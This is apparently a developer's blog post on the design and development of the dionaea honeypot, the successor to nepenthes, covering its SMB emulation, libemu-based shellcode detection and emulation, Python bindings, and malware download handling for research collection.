While there was little development regarding nepenthes, there was lots of activity within dionaea lately.
Dionaea is meant to be a nepenthes successor,
embedding python as scripting language,
using libemu to detect shellcodes,
supporting ipv6 and tls
Dionaea is the result of all shortcomings we experienced with nepenthes, therefore it is meant to supersede nepenthes.
A major problem in nepenthes was vulnerability modules for port 445, there were just too many exploitable vulnerabilities on the same port. Our approach not to implement the protocol failed, made it impossible to keep up with exploitation trends.
More exploits started using Windows API to establish a valid CIFS/SMB session to the attacked host, before sending the exploits payload.
As nepenthes does not speak SMB, we did not get the payload, no payload, no sample.
Nepenthes uses pattern matching with perl regular expressions to detect shellcode.
Pattern matching is pretty popular, but it only works if you have a pattern for the shellcode already.
Creating patterns for unknown shellcode is tricky, you need a copy of the shellcode so you can create a pattern, finding unknown shellcode from nepenthes output is rather difficult. Even though we created a system where you could describe shellcode patterns in a configuration file, we never received any new shellcode patterns.
In the meantime, we wrote libemu, which can detect shellcode using emulation, automatically, without any interaction.
You provide a buffer, libemu will try to detect shellcode, even unknown shellcode.
While writing libemu, the plan was integration within nepenthes, this turned out to be a nightmare by its own.
Detecting shellcode using (libemu's) emulation is pretty fast, getting an idea what the shellcode would to if run natively is not, it takes it's time.
For nepenthes this shellcode emulation would prevent the software from doing anything else, as the initial idea was not to use threads.
Trying to make nepenthes aware of threads was a good idea, but turned out to be not the best idea, it just did not work, was hard to debug, no fun to work with.
Even though we always claimed it was easy to write nepenthes modules/addons, there was very little contribution. I figured most people stick with Niklaus Wirth:
C++ is an insult to the human brain.
Some services, for example https, require TLS encryption, no way to get this done within nepenthes.
Even though nobody uses it, we wanted to give it a shot, integration within nepenthes might have been possible, but it would have been a lot of work, even though there is no no malware using IPv6 yet.
Taking the experience with nepenthes, and all the shortcomings, we decided to start over.
I've been playing with libev for a while, and it turned out to be great software, easy to use, providing exactly the feature set I was looking for.
As I did not want to go for c++ again, I was looking for a library providing all required data structures and types for c, glib is not perfect, but provides a stable api and is available within all major distributions.
Next thing was an embedding a scripting library, I've had experience with embedding lua before, so it was set on the list of possible languages. Same for spidermonkey. I've had little to no experience with embedding python, or python itself, and did not even like the language, but my environment pushed me to give python a shot.
Using cython, embedding python turned out to be a pleasure, and as I've had serious problems with spidermonkey's garbage collector and lua did not provide the required features, python won the embeddable scripting language contest.
For TLS, openssl is widely used, so I decided to go for it too.
For asynchronous dns resolves, there was adns and udns, and I decided to go for udns, as adns still fails with staged cnames and udns had working support for AAAA records to deal with ipv6.
For downloading things via http, I decided to stick with libcurl.
For shellcode detection, stick with libemu, we maintain it, so we can adjust it.
Configuration file parsing, we've had liblcfg already, so Paul to adjusted it to fit our requirements.
The Honeynet Project decided to fund the nepenthes successor during the summer, as a project running parallel to Google Summer of Code.
After providing project description and milestones, Mark and myself were allowed to spent the summer working on dionaea.
Mark's field of action was writing an working smb emulation in python, where I was to write the software itself and the python bindings, so Mark could use them.
In the beginning Mark used the previously mentioned python-embedding-testcode to work with, until I catched up and he could use the actual software we call dionaea.
Once the required python bindings were written, both of us could work indepent from each other. Of course, from time to time we discussed changes which would break the python bindings, then I broke it, and he adjusted the smb emulation to comply with the changes.
Once the basics were working, I started integrating libemu to detect shellcodes, using threads, as I wrote the api to deal with libemu and tried to get it working within nepenthes before, there was no unexpected surprise.
Next thing, once a shellcode is detected, we needed to do something with it. libemu can create a 'profile' for shellcode, so we needed a way to evaluate the shellcodes profile and act upon it.
Decision was to serialize the shellcode profile to json, and guess what the shellcode would do in python. Even though I got the idea serializing to python structures could have been a better choice, there were no drawbacks using json yet.
At a given point, we were able
to emulate smb,
detect shellcode in attacks,
create profiles for the detected shellcode,
guess what the shellcode would do,
act upon it.
Next thing was writing an cmd.exe emulation, in python, beeing able to parse shell commands, and we needed something to download malware via ftp/tftp.
For TFTP I had a look on tftpy, asked the author for permission to relicense his software to use it in a GPL licensed project, and got it.
So we took tftpy, and adjusted it to work using the exported python api for network io and comply with python3.
After we've had the core functionality, the python bindings, the smb emulation (python), libemu shellcode detection, libemu shellcode profile serialization, shellcode profile evaluation (python), cmd.exe parsing (python) and something to download via tftp (python), we took a first sensor online, and caught our first sample via tftp with dionaea.
Next we had wanted to be able to download malware distributed using ftp services.
As ftp services embedded in malware do not work with libcurl, we had to write an ftp client which would mimic the windows ftp.exe clients behaviour.
As I already had python basics, I wrote it in python.
We got our first sample download via ftp.
But we've had attacks which we detected, but could not act upon the profile, all of these attacks were multi stage shellcode, where the first stage of the shellcode would connect to the attacker, receive a second stage, and execute the second stage.
The link:// and blink:// protocols you may know from nepenthes are such multistage shellcodes, the first stage connects to the attacker, sends a cookie, and executes the second stage the attacker sends - if the cookie was correct. The seconds stage would download a file, and execute it.
As the emulation profile did not include the second stage, we were unable to act upon it.
So we had to execute the shellcode within libemu, proxy all required calls to the host operating system, and 'let the shellcode do his job', and grab the downloaded file once the shellcode finished. We took several measurements to make sure the shellcode can't harm the honeypot software, limiting it by number of files/sockets used and filesize as well as 'steps' and cpu-time spent on it.
After I noticed this emulation beeing really slow, due to libdasm creating strings for every instruction executed, we patched libemu to disable libdasm, and cought our first sample using shellcode emulation.
Lately, we added support for surfnet's surfids, they still host all of our projects, so it was a honorable duty to support their ids. Adding support to report to surfids was really convenient, they provided access to their testing system, so I did not have to setup my own, and could start getting things done.
I'm really convinced it was a good idea to start over.
By the time, I even started loving python, though it is not perl.
It is fun to work with dionaea, and it gives good results.
The smb emulation layer Mark wrote is great, Georg decided to use it in mwcollect, and I asked Jan from amun honeypot to have a look as it gives really good results.
You can use dionaea, even if there is no release package.
Just grab it from svn.
Installation is slightly more complex than installing nepenthes, as you'll have to install some dependencies from source, but keeping an eye on the documentation, everybody should be able to compile and run it.
If want to contribute you experience problems, hit the nepenthes-devel list.